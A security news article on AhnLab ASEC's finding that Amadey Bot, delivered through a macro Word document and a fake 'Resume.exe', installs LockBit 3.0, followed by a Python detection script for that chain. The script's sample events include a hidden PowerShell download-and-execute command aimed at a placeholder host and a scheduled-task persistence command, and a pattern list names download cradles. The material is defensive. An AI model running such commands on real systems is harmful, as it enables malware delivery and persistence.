The ASEC analysis team has confirmed that cybercriminal groups are using Amadey Bot to install LockBit.

Amadey Bot is being distributed through two methods: a malicious Word document and an executable disguised with a Word file icon.

LockBit ransomware encrypts files in the user's environment, changes the desktop wallpaper, and notifies the user with a ransom note.

AhnLab's ASEC analysis team announced that they discovered attackers using Amadey Bot to install LockBit. Amadey Bot, first seen in 2018, steals information and installs additional malware by receiving commands from the attacker's C&C server. Like other commodity malware, Amadey Bot is currently sold on underground forums and used by various cybercriminal groups.

Word document file

In the past, multiple cybercriminal groups distributed Amadey Bot disguised as a popular Korean messenger program. Now it is being distributed using a malicious Word document and an executable disguised with a Word file icon.

A document named Sia_Sim.docx was uploaded to VirusTotal. When opened, it downloads a Word file containing a malicious VBA macro from a remote URL. The document body contains an image that prompts the user to click "Enable Content", which enables the VBA macro. Once the user clicks the Enable Content button, the VBA macro executes: it creates an LNK file that acts as a downloader, running a PowerShell command to download and execute Amadey.

In the other method, the malware was found as "Resume.exe", also disguised with a Word file icon. The executable, built with a compression program, is sent as an email attachment. Both methods use the same C&C server and download URL. Once running, Amadey copies itself into the Temp directory and registers a scheduled task so that it runs again after a reboot. AhnLab's ASEC analysis team said,

« LockBit samples that are installed via Amadey have been distributed in Korea since 2022, and the team has posted various articles analyzing the ransomware. The recently confirmed version is LockBit 3.0, which is distributed using keywords such as job application and copyright. Judging from the themes, it appears that the attack is targeting companies. LockBit ransomware infects files that exist in the user's environment, changes the desktop as seen below, and notifies the user. It then creates a ransom note in each folder, stating that all data in the system has been encrypted and stolen, and threatening the user that the data will be decrypted and leaked on the Internet if they refuse to pay money. »
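The delivery chain described above (Word macro → LNK → PowerShell downloader, then a copy in the Temp directory registered as a scheduled task) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the ASEC report, of hunting heuristics over Sysmon Event ID 1-style records. The rule thresholds, the field names and the sample events are my own assumptions and constructed data; the URL and task name in the samples are placeholders, not indicators from the report.

```python
import re

# Process-creation fields modelled on Sysmon Event ID 1 (Image, ParentImage, CommandLine).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Common PowerShell download/execute primitives. The report says the macro-created LNK
# runs a PowerShell command that downloads and runs Amadey; the exact command is not given,
# so this list is an assumption about what such a stage usually contains.
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|"
    r"start-bitstransfer|invoke-expression|\biex\b",
    re.I,
)
# Per-user and system Temp directories, where the report says Amadey copies itself.
TEMP_DIR = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.I)
TASK_CREATE = re.compile(r"/create\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return [(rule_id, reason), ...] for one process-creation event."""
    hits = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")

    # Rule 1: an Office application spawning a script host (macro -> LNK -> PowerShell stage).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        why = f"{parent} spawned {image}"
        if DOWNLOAD_CRADLE.search(cmd):
            why += " with a download cradle"
        hits.append(("office_spawns_script_host", why))
    # Rule 2: any script host running a download cradle; catches the LNK stage even when
    # the parent is explorer.exe rather than WINWORD.EXE.
    elif image in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(cmd):
        hits.append(("script_host_download_cradle", f"{image} command line contains a download cradle"))

    # Rule 3: a scheduled task whose action lives in a Temp directory (Amadey persistence).
    if image == "schtasks.exe" and TASK_CREATE.search(cmd) and TEMP_DIR.search(cmd):
        hits.append(("schtask_runs_from_temp", "schtasks /create with an action inside a Temp directory"))
    return hits


def scan(events):
    """Run every rule over a list of events; returns [(event_index, rule_id, reason), ...]."""
    findings = []
    for idx, ev in enumerate(events):
        for rule, why in check_event(ev):
            findings.append((idx, rule, why))
    return findings


# Constructed sample telemetry (not real events): two malicious, two benign.
SAMPLE_EVENTS = [
    {  # macro-launched PowerShell downloader stage
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/stage')\"",
    },
    {  # the Temp-directory copy registering itself as a scheduled task
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\abcd\Resume.exe",
        "CommandLine": r'schtasks /create /f /tn "Updater" '
                       r'/tr "C:\Users\user\AppData\Local\Temp\abcd\Resume.exe" /sc minute /mo 1',
    },
    {  # benign: a user opening a document from Explorer
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n '
                       r'"C:\Users\user\Documents\notes.docx"',
    },
    {  # benign: an admin listing tasks
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "schtasks /query /fo list",
    },
]

if __name__ == "__main__":
    for idx, rule, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {why}")
```

Rule 1 is the high-confidence signal: an Office process with a script-host child is rare outside macro abuse. Rule 3 is noisier on its own (some installers also schedule tasks from Temp), so in practice it is worth correlating with the parent image also residing in Temp, as in the sample, before paging anyone.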